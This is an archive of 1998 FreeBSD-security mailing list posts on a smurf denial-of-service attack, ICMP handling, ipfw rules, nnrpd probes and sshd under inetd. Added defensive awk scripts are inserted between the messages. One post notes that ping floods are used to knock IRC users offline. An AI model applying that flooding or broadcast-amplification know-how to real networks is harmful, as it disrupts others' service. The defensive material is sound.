From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199809140706.AAA16521@bubba.whistle.com>, Archie Cobbs writes: >If someone was interested, it would be easy to write a script >that checks all the ports: By all means go for it :-) Poul-Henning > > - mount / and /usr read-only > - mount /usr/local and /usr/local2 read-write, initially empty > except for the directory structure > - save mtree dumps of every file in /usr/local and /usr/local2 > - cycle through every port and: > - build the port with PREFIX=/usr/local > - install the port, then uninstall the port > - compare the contents of /usr/local with the mtree file > - build the port with PREFIX=/usr/local2 > - install the port, then uninstall the port > - compare the contents of /usr/local2 AND /usr/local > with the mtree files > >If any port exhibited bad behavior, it could also automatically >generate a send-pr report :-) > >-Archie > >___________________________________________________________________________ >Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." 
"ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 01:08:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA27435 for freebsd-security-outgoing; Mon, 14 Sep 1998 01:08:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA27372 for ; Mon, 14 Sep 1998 01:08:03 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id JAA20982 for ; Mon, 14 Sep 1998 09:07:41 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id JAA14358 for ; Mon, 14 Sep 1998 09:07:40 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Mon, 14 Sep 1998 09:07:40 +0100 (BST) 
From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: security@FreeBSD.ORG Subject: Re: odd icmp packet In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

| I monitor odd packets on broadcast channels, and this turned up in my
| logs:
|
| Sep 14 14:57:55 dawn /kernel: ipfw: 60100 Accept ICMP:11.0 xxx.xx.xx.xx
| 255.255.255.255 in via de0
|
| xxx.xx.xx.xx is not on my subnet, but the machine which recorded this is
| not behind a firewall except in so far as it runs its own filters
|
| ICMP:11.0 indicates time exceeded in transit. Can someone explain what
| might have caused this.
|
| Am I correct in thinking that because ICMP packets do not generate
| responses this does not have DoS relevance?

Not really; an ICMP ping flood is quite a substantial way of DoS'ing someone and tends to eat up all the bandwidth on a modem connection - depending upon the source of the ICMPs you could quite easily saturate a [T|E]1 or higher. It's often used on the IRC networks when someone's trying to flood someone else off.
You're right in thinking that a Time Exceeded in Transit can't cause a DoS though (although someone's bound to prove me wrong ;)

Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Sep 14 02:19:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA06547 for freebsd-security-outgoing; Mon, 14 Sep 1998 02:19:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from orbital.tiora.net (cx31658-a.escnd1.sdca.home.com [24.0.185.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA06532 for ; Mon, 14 Sep 1998 02:18:58 -0700 (PDT) (envelope-from liam@orbital.tiora.net) Received: from localhost (liam@localhost) by orbital.tiora.net (8.9.1a/8.9.1a+rbl+antispam+zol_hack) with SMTP id BAA00727 for ; Mon, 14 Sep 1998 01:59:25 -0700 (PDT) Date: Mon, 14 Sep 1998 01:59:24 -0700 (PDT)
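An added example, not from the thread: an awk parser for ipfw log lines of the shape quoted in the exchange above that decodes the ICMP type and tallies sources sending echo requests to broadcast addresses, the traffic pattern a host sees when it is being used as a smurf amplifier. The log lines and addresses are constructed (RFC 5737 documentation ranges), and the "last octet 255" heuristic assumes /24 or larger subnets.

```shell
#!/bin/sh
# Added example, not from the thread: parse ipfw(8) syslog lines of the form
#   ipfw: <rule> <Action> <PROTO>[:<type>.<code>] <src> <dst> <in|out> via <if>
# (the layout of the line quoted above), decode the ICMP type, and count the
# sources sending echo requests to broadcast addresses. The log lines and
# addresses below are constructed for the demo; ICMP type names follow RFC 792.

# parse_ipfw_log < syslog-lines
#   One record per ipfw line, fields separated by single spaces:
#   rule action proto icmp-name src dst dir iface   (icmp-name is "-" for non-ICMP)
parse_ipfw_log() {
    awk '
    BEGIN {
        name[0] = "echo-reply";    name[3]  = "dest-unreachable"
        name[4] = "source-quench"; name[5]  = "redirect"
        name[8] = "echo-request";  name[11] = "time-exceeded"
        name[12] = "parameter-problem"
    }
    {
        for (i = 1; i <= NF; i++) if ($i == "ipfw:") break
        if (i > NF) next                    # not an ipfw line
        proto = $(i+3); icmp = "-"
        if (proto ~ /^ICMP:/) {             # "ICMP:11.0" -> type 11, code 0
            split(substr(proto, 6), tc, ".")
            icmp = ((tc[1] in name) ? name[tc[1]] : "type-" tc[1]) "(" tc[1] "." tc[2] ")"
            proto = "ICMP"
        }
        print $(i+1), $(i+2), proto, icmp, $(i+4), $(i+5), $(i+6), $(i+8)
    }'
}

# smurf_sources < syslog-lines
#   Sources that sent ICMP echo requests to a broadcast address, with counts.
#   "Broadcast" here means 255.255.255.255 or a last octet of 255, which
#   assumes /24 or larger subnets; adjust the pattern for other masks.
smurf_sources() {
    parse_ipfw_log | awk '
        $3 == "ICMP" && $4 ~ /^echo-request/ && ($6 == "255.255.255.255" || $6 ~ /\.255$/) { n[$5]++ }
        END { for (s in n) print s, n[s] }' | sort
}

# Constructed sample: the first line mirrors the shape of the one quoted above.
SAMPLE_LOG='Sep 14 14:57:55 dawn /kernel: ipfw: 60100 Accept ICMP:11.0 192.0.2.7 255.255.255.255 in via de0
Sep 14 14:58:01 dawn /kernel: ipfw: 60100 Accept ICMP:8.0 198.51.100.9 203.0.113.255 in via de0
Sep 14 14:58:01 dawn /kernel: ipfw: 60100 Accept ICMP:8.0 198.51.100.9 203.0.113.255 in via de0
Sep 14 14:58:02 dawn /kernel: ipfw: 100 Deny TCP 198.51.100.9:4040 203.0.113.5:23 in via de0
Sep 14 14:58:03 dawn sshd[123]: Accepted password for alice from 192.0.2.7'

printf '%s\n' "$SAMPLE_LOG" | parse_ipfw_log
printf '%s\n' "$SAMPLE_LOG" | smurf_sources
```

Running it over a real log (for instance `grep ipfw: /var/log/messages | smurf_sources`) gives the same per-source counts; the time-exceeded line from the question is parsed but not counted, since only echo requests feed an amplifier.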
From: Liam Slusser To: security@FreeBSD.ORG Subject: smurf and broadcast packets.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Today my server was bombed by a smurf attack. After I got everything up and running again, I went out and tried to figure out how to stop it from happening again. I found a CERT advisory ("smurf" IP Denial-of-Service Attacks) (CA-98.01.smurf) and read up on it. From what I understand, it is a ping on *.*.*.255..which gets multiplied. I tried pinging my network (24.0.185.255) and my server replied. So I did a little more looking, and found a post, http://www.geek-girl.com/bugtraq/1998_2/0421.html (explains FreeBSD smurf vulnerability) on the problem. I installed the patch which involved editing ip_icmp.c in the kernel source...then I came back up...I tried again...but I could still ping 24.0.185.255 and get a reply.

From there, I checked sysctl "net.inet.icmp.bmcastecho" and noticed it was set at 1. I changed it to 0, and from there...I ran into a weird problem. My server has two network cards in it, ed0 (internet side, 24.0.185.89) and ed1 (internal network, 10.0.0.1), and runs natd. When I turned net.inet.icmp.bmcastecho to 0..I could not ping 10.0.0.255 but I could ping my internet side 24.0.189.255.

ping 10.0.0.255
PING 10.0.0.255 (10.0.0.255): 56 data bytes
--- 10.0.0.255 ping statistics ---
2 packets transmitted, 0 packets received, 100% packet loss

ping 24.0.185.255
PING 24.0.185.255 (24.0.185.255): 56 data bytes
64 bytes from 24.0.185.89: icmp_seq=0 ttl=255 time=0.857 ms
64 bytes from 24.0.185.89: icmp_seq=1 ttl=255 time=0.692 ms
--- 24.0.185.255 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss

With "net.inet.icmp.bmcastecho" set at 1, I could ping 10.0.0.255 and get a reply..but not at 0.
I do have ipfw installed..the rules as follows:

ipfw list
00100 divert 6668 ip from any to any via ed0
00200 allow ip from any to any
65535 deny ip from any to any

By the way, my server is running...

uname -a
FreeBSD orbital.tiora.net 3.0-971225-SNAP FreeBSD 3.0-971225-SNAP #0: Mon Sep 14 00:59:08 PDT 1998 liam@orbital.tiora.net:/usr/src/sys/compile/orbital i386

What am I doing wrong? What can I do to stop my server from being the victim of another smurf attack?

thanks for the help!

liam System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address Lowered turbo powered Honda Civic's are really cool. <---------- my quote

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Sep 14 06:11:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA02571 for freebsd-security-outgoing; Mon, 14 Sep 1998 06:11:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from drwho.xnet.com (drwho.xnet.com [205.243.140.183]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA02565 for ; Mon, 14 Sep 1998 06:11:09 -0700 (PDT) (envelope-from drwho@drwho.xnet.com) Received: (from drwho@localhost) by drwho.xnet.com (8.8.8/8.8.8) id IAA27428; Mon, 14 Sep 1998 08:10:49 -0500 (CDT) (envelope-from drwho) Message-ID: <19980914081048.A27142@drwho.xnet.com> Date: Mon, 14 Sep 1998 08:10:48 -0500
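An added example, not from the thread: a check of the two host-side controls Liam is working with, the net.inet.icmp.bmcastecho sysctl and the ipfw rule order, fed either the live output of sysctl and `ipfw list` or the constructed samples in the block. The rule set marked as posted is the one from the message above; the deny rule numbered 150 in the second set is a constructed suggestion, placed ahead of rule 200 because nothing after an allow-all rule is ever evaluated.

```shell
#!/bin/sh
# Added example, not from the thread: check the two host-side controls
# discussed above, the net.inet.icmp.bmcastecho sysctl and the ipfw rule
# order. Both checks read text in the format sysctl(8) and "ipfw list"
# print, so they can be fed live output or the constructed samples below.

# bmcastecho_off < "net.inet.icmp.bmcastecho: N"
#   0 if the kernel is set not to answer echo requests sent to broadcast or
#   multicast addresses (value 0); 1 if the line is missing or the value is not 0.
bmcastecho_off() {
    awk -F': ' '$1 == "net.inet.icmp.bmcastecho" { seen = 1; v = $2 }
                END { exit (seen && v == 0) ? 0 : 1 }'
}

# broadcast_icmp_denied BCAST < "ipfw list" output
#   0 if a deny rule for icmp (or all ip) to BCAST comes before the first
#   "allow ip from any to any". Rules after an allow-all never match, which
#   is the pitfall in the posted rule set: rule 200 allows everything.
broadcast_icmp_denied() {
    awk -v b="$1" '
        $2 == "deny"  && ($3 == "icmp" || $3 == "ip") && $7 == b { hit = 1; exit }
        $2 == "allow" && $3 == "ip" && $5 == "any" && $7 == "any" { exit }
        END { exit hit ? 0 : 1 }'
}

# audit_smurf BCAST SYSCTL_TEXT IPFW_TEXT: print findings, return 1 on any warning.
audit_smurf() {
    rc=0
    if printf '%s\n' "$2" | bmcastecho_off; then
        echo "ok:   kernel drops echo requests to broadcast addresses"
    else
        echo "warn: net.inet.icmp.bmcastecho is not 0 (sysctl -w net.inet.icmp.bmcastecho=0)"
        rc=1
    fi
    if printf '%s\n' "$3" | broadcast_icmp_denied "$1"; then
        echo "ok:   ipfw denies icmp to $1 ahead of the allow-all rule"
    else
        echo "warn: no ipfw deny for icmp to $1 before the allow-all rule"
        rc=1
    fi
    return $rc
}

# Constructed samples: the first rule set is the one posted above; the second
# adds a deny for the external broadcast address ahead of rule 200.
RULES_POSTED='00100 divert 6668 ip from any to any via ed0
00200 allow ip from any to any
65535 deny ip from any to any'
RULES_FIXED='00100 divert 6668 ip from any to any via ed0
00150 deny icmp from any to 24.0.185.255 in via ed0
00200 allow ip from any to any
65535 deny ip from any to any'

echo "== as posted"
audit_smurf 24.0.185.255 'net.inet.icmp.bmcastecho: 1' "$RULES_POSTED" || echo "-> action needed"
echo "== with sysctl at 0 and the deny rule in place"
audit_smurf 24.0.185.255 'net.inet.icmp.bmcastecho: 0' "$RULES_FIXED" || echo "-> action needed"
```

To run it against the live box, pass `"$(sysctl net.inet.icmp.bmcastecho)"` and `"$(ipfw list)"` as the second and third arguments; the ordering check is the part that matters most, since a deny added after rule 200 would look right in the listing but never fire.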
From: Michael Maxwell To: freebsd-security@FreeBSD.ORG Subject: innd 1.7.2 issues... Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i X-Useless-Header: http://www.xnet.com/~drwho/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I wonder if anyone is aware of any new exploits concerning innd 1.7.2? I have not seen anything on CERT recently. I noticed that I have been getting several refused connections to my nnrpd port -- naturally I disallow all connections outside my local site, so the logs show the connection as "no permission". Normally, this wouldn't concern me, but the last 2 weeks or so, I have gotten maybe 15 connections of this type, when normally I get none. The connections are USUALLY from different domains (I think only once was there a repeat) -- drwho @ xnet.com -- http://www.xnet.com/~drwho/ "Freedom of government is good, but freedom FROM government is better." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 07:58:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA15144 for freebsd-security-outgoing; Mon, 14 Sep 1998 07:58:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.ripco.com (relay.ripco.com [209.100.227.3]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id HAA15137 for ; Mon, 14 Sep 1998 07:58:07 -0700 (PDT) (envelope-from rezidew@rezidew.net) Received: (qmail 22854 invoked from network); 14 Sep 1998 14:57:53 -0000 Received: from soap.rezidew.net (HELO rezidew.net) (209.100.228.86) by relay.ripco.com with SMTP; 14 Sep 1998 14:57:53 -0000 Message-ID: <35FD30D3.E2ABACB1@rezidew.net> Date: Mon, 14 Sep 1998 10:05:55 -0500 
From: Graphic Rezidew Organization: rezidew.net X-Mailer: Mozilla 4.04 [en] (X11; I; FreeBSD 2.2.7-RELEASE i386) MIME-Version: 1.0 To: FreeBSD-security-List Subject: version of sshd Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

First off, thanks to everyone that responded to my earlier plea for assistance, regarding SSH. Now I have a new question; does anyone know if version 1.2.26 of ssh has any currently known exploits? I ask because that's the version available from the ports/packages, and I don't want to install potentially hazardous software. I know that version 2.0.x is available but since all of the clients that I'll be using are 1.x I don't see any reason to install a 2.0.x server unless it's decidedly more secure.

-thanks in advance.

-- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Real programmers don't comment their code. It was hard to write, it should be hard to understand. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Graphic Rezidew Graphic@rezidew.net http://Graphic.Rezidew.net

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Sep 14 08:28:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA19295 for freebsd-security-outgoing; Mon, 14 Sep 1998 08:28:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA19271 for ; Mon, 14 Sep 1998 08:28:09 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id LAA26468; Mon, 14 Sep 1998 11:27:30 -0400 (EDT) (envelope-from wollman) Date: Mon, 14 Sep 1998 11:27:30 -0400 (EDT)
From: Garrett Wollman Message-Id: <199809141527.LAA26468@khavrinen.lcs.mit.edu> To: Michael Maxwell Cc: freebsd-security@FreeBSD.ORG Subject: innd 1.7.2 issues... In-Reply-To: <19980914081048.A27142@drwho.xnet.com> References: <19980914081048.A27142@drwho.xnet.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I noticed that I have been getting several refused connections to my nnrpd > port -- naturally I disallow all connections outside my local site, so the > logs show the connection as "no permission". There are many spammers out there who scan the Path: headers in received news looking for poorly-configured news servers which might allow open posting so they can inject their tripe. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 09:02:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA24325 for freebsd-security-outgoing; Mon, 14 Sep 1998 09:02:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA24319 for ; Mon, 14 Sep 1998 09:02:51 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id JAA27503 for ; Mon, 14 Sep 1998 09:02:30 -0700 (PDT) Date: Mon, 14 Sep 1998 09:02:30 -0700 (PDT) 
From: Roger Marquis To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 14 Sep 1998, spork wrote:
> Number of times sshd died: 0
> ...

A common data point but there's also the shell that is spawned by sshd and applications spawned by the shell. Any of those can hang a session too. The most common problem I've seen is corrupt terminal definitions that no combination of setenv, tset and reset will fix.

> If you really need a backup access method, get a console server :)

Have that too but there are many situations where it's not feasible.

The real issue, it seems to me, is consistency. If ftp, telnet, rsh, rlogin, etc. run from inetd then sshd should also. The original reason it wasn't is the key generation delay, which isn't an issue on anything faster than a 486/25.

Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Mon Sep 14 10:06:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA06521 for freebsd-security-outgoing; Mon, 14 Sep 1998 10:06:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA06502 for ; Mon, 14 Sep 1998 10:06:15 -0700 (PDT) (envelope-from sthaug@nethelp.no)
From: sthaug@nethelp.no Received: (qmail 4811 invoked by uid 1001); 14 Sep 1998 17:05:57 +0000 (GMT) To: marquis@roble.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Your message of "Mon, 14 Sep 1998 09:02:30 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 14 Sep 1998 19:05:57 +0200 Message-ID: <4809.905792757@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> The real issue, it seems to me, is consistency. If ftp, telnet, rsh,
> rlogin, etc. run from inetd then sshd should also. The original reason it
> wasn't is the key generation delay, which isn't an issue on anything
> faster than a 486/25.

That may be the real issue for you - not necessarily for everybody.

Also, the key generation delay is certainly measurable. Running "ssh host date" between two P-166 machines:

- sshd running as daemon: 1 - 1.2 seconds
- sshd running from inetd: 4 - 5 seconds

That difference may not be significant for a long term login session, but could easily be significant for rsh type use.

Myself, I have turned off most services in /etc/inetd.conf. The fewer services that run, the fewer possible holes. I *definitely* don't run rsh and rlogin. For high security situations I recommend against using the standard inetd - better to use for instance Marcus Ranum's mini-inetd (79 lines) where you can more easily convince yourself that the code does what you want.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon Sep 14 10:29:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA08679 for freebsd-security-outgoing; Mon, 14 Sep 1998 10:29:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA08671 for ; Mon, 14 Sep 1998 10:29:51 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with SMTP id NAA21219; Mon, 14 Sep 1998 13:29:28 -0400 (EDT) Date: Mon, 14 Sep 1998 13:29:28 -0400 (EDT)
From: Snob Art Genre Reply-To: ben@rosengart.com To: Liam Slusser cc: security@FreeBSD.ORG Subject: Re: smurf and broadcast packets.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 14 Sep 1998, Liam Slusser wrote:
> changed it to 0, and from there...i ran into a weird
> problem. My server has two network cards in it, ed0 (internet side,
> 24.0.185.89) and ed1 (internal network, 10.0.0.1), and runs natd. When i
> turned net.inet.icmp.bmcastecho to 0..i could not ping 10.0.0.255 but i
> could ping my internet side 24.0.189.255.

Not so weird. The broadcast address on your internal network is probably 10.255.255.255.

Ben

"You have your mind on computers, it seems."

From owner-freebsd-security Mon Sep 14 10:32:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA09164 for freebsd-security-outgoing; Mon, 14 Sep 1998 10:32:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dworkin.amber.org (dworkin.amber.org [209.31.146.74]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA09144 for ; Mon, 14 Sep 1998 10:32:38 -0700 (PDT) (envelope-from petrilli@dworkin.amber.org) Received: (from petrilli@localhost) by dworkin.amber.org (8.9.0/8.9.0) id NAA08920; Mon, 14 Sep 1998 13:32:21 -0400 (EDT) Message-ID: <19980914133221.57736@amber.org> Date: Mon, 14 Sep 1998 13:32:21 -0400
From: "Christopher G. Petrilli" To: freebsd-security@FreeBSD.ORG Subject: Re: sshd Mail-Followup-To: freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89.1i In-Reply-To: ; from Roger Marquis on Mon, Sep 14, 1998 at 09:02:30AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, Sep 14, 1998 at 09:02:30AM -0700, Roger Marquis wrote:
> On Mon, 14 Sep 1998, spork wrote:
> > Number of times sshd died: 0
>
> A common data point but there's also the shell that is spawned by sshd and
> applications spawned by the shell. Any of those can hang a session
> too. The most common problem I've seen is corrupt terminal definitions
> that no combination of setenv, tset and reset will fix.

Just a small data point as well, I've had sshd running on 4 different machines I own as the ONLY way to get into them (no inetd running on any of them), and guess what? I've never had a problem, ever in a sum-total of 3 1/2 machine years. Reliability is obviously not the reason to do this.

>
> > If you really need a backup access method, get a console server :)
>
> Have that too but there are many situations where it's not feasible.
>
> The real issue, it seems to me, is consistency. If ftp, telnet, rsh,
> rlogin, etc. run from inetd then sshd should also. The original reason it
> wasn't is the key generation delay, which isn't an issue on anything
> faster than a 486/25.

Then we should run xntpd out of inetd, do you run httpd out of inetd? :-) really, this is just silly... if at all possible, get rid of inetd, it's a huge problem as it is, and it will just wholesale eliminate all the problems ;-) well, not all of them, but a large chunk.
Chris
--
| Christopher Petrilli
| petrilli@amber.org

From owner-freebsd-security Mon Sep 14 10:43:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA11512 for freebsd-security-outgoing; Mon, 14 Sep 1998 10:43:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from drwho.xnet.com (drwho.xnet.com [205.243.140.183]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA11503 for ; Mon, 14 Sep 1998 10:42:56 -0700 (PDT) (envelope-from drwho@drwho.xnet.com) Received: (from drwho@localhost) by drwho.xnet.com (8.8.8/8.8.8) id MAA05043; Mon, 14 Sep 1998 12:42:39 -0500 (CDT) (envelope-from drwho) Message-ID: <19980914124239.A5031@drwho.xnet.com> Date: Mon, 14 Sep 1998 12:42:39 -0500
From: Michael Maxwell To: freebsd-security@FreeBSD.ORG Subject: Re: innd 1.7.2 issues... Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <19980914081048.A27142@drwho.xnet.com> <199809141527.LAA26468@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i In-Reply-To: <199809141527.LAA26468@khavrinen.lcs.mit.edu>; from Garrett Wollman on Mon, Sep 14, 1998 at 11:27:30AM -0400 X-Useless-Header: http://www.xnet.com/~drwho/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, Sep 14, 1998 at 11:27:30AM -0400, Garrett Wollman wrote:
> < said:
>
> > I noticed that I have been getting several refused connections to my nnrpd
> > port -- naturally I disallow all connections outside my local site, so the
> > logs show the connection as "no permission".
>
> There are many spammers out there who scan the Path: headers in
> received news looking for poorly-configured news servers which might
> allow open posting so they can inject their tripe.
>

Ok, this would make sense as I recognized one of the connections being from a known spam domain (club-internet.fr) whom I've dealt with regarding their spamming in the past. I just found it interesting that this has only just started to occur.

--
drwho @ xnet.com -- http://www.xnet.com/~drwho/
"Freedom of government is good, but freedom FROM government is better."
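Michael's message above concerns refused nnrpd connections that only show up as "no permission" lines in the news log. The script below is an added example, not something from this thread or from INN: a POSIX sh/awk summary of such refusals per remote host, so that a source that keeps coming back is visible without reading syslog by hand. The log lines are a constructed sample in the layout nnrpd used (client host name followed by the `no_permission` token); the layout is an assumption about that era's nnrpd and the host names are invented.

```shell
#!/bin/sh
# Added example (not from the thread or from INN): summarise refused nnrpd
# connections per remote host. SAMPLE_LOG is a constructed sample in the
# assumed nnrpd syslog layout; host names are invented.
SAMPLE_LOG='Sep 14 08:01:12 newshost nnrpd[27001]: reader1.example.net no_permission
Sep 14 08:01:40 newshost nnrpd[27002]: relay.spamsource.example no_permission
Sep 14 08:02:03 newshost nnrpd[27003]: relay.spamsource.example no_permission
Sep 14 08:05:17 newshost nnrpd[27010]: reader.localsite.example connect
Sep 14 08:06:22 newshost nnrpd[27010]: reader.localsite.example exit articles 0 groups 1
Sep 14 08:10:48 newshost nnrpd[27142]: relay.spamsource.example no_permission
Sep 14 08:12:09 newshost nnrpd[27150]: other.example.org no_permission'

# Count refusals per remote host, busiest host first (ties broken by name).
# Field 5 is the syslog tag "nnrpd[pid]:", field 6 the client host name and
# the last field the nnrpd event; only "no_permission" events are counted.
refused_by_host() {
    printf '%s\n' "$1" | awk '
        $5 ~ /^nnrpd\[/ && $NF == "no_permission" { n[$6]++ }
        END { for (h in n) printf "%d %s\n", n[h], h }
    ' | sort -k1,1nr -k2,2
}

# Hosts refused at least THRESHOLD times (default 3): the ones worth a
# firewall rule or an abuse report rather than a line in a log you skim.
repeat_offenders() {
    threshold=${2:-3}
    refused_by_host "$1" | awk -v t="$threshold" '$1 >= t { print $2 }'
}

# Stand-alone report for the constructed sample.
echo "refusals per host:"
refused_by_host "$SAMPLE_LOG"
echo "repeat offenders: $(repeat_offenders "$SAMPLE_LOG" | tr '\n' ' ')"
```

On a real server, feed `refused_by_host` the relevant lines from the news log (for instance the output of `grep no_permission` over news.notice) instead of the embedded sample; the threshold for `repeat_offenders` is a local policy choice.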
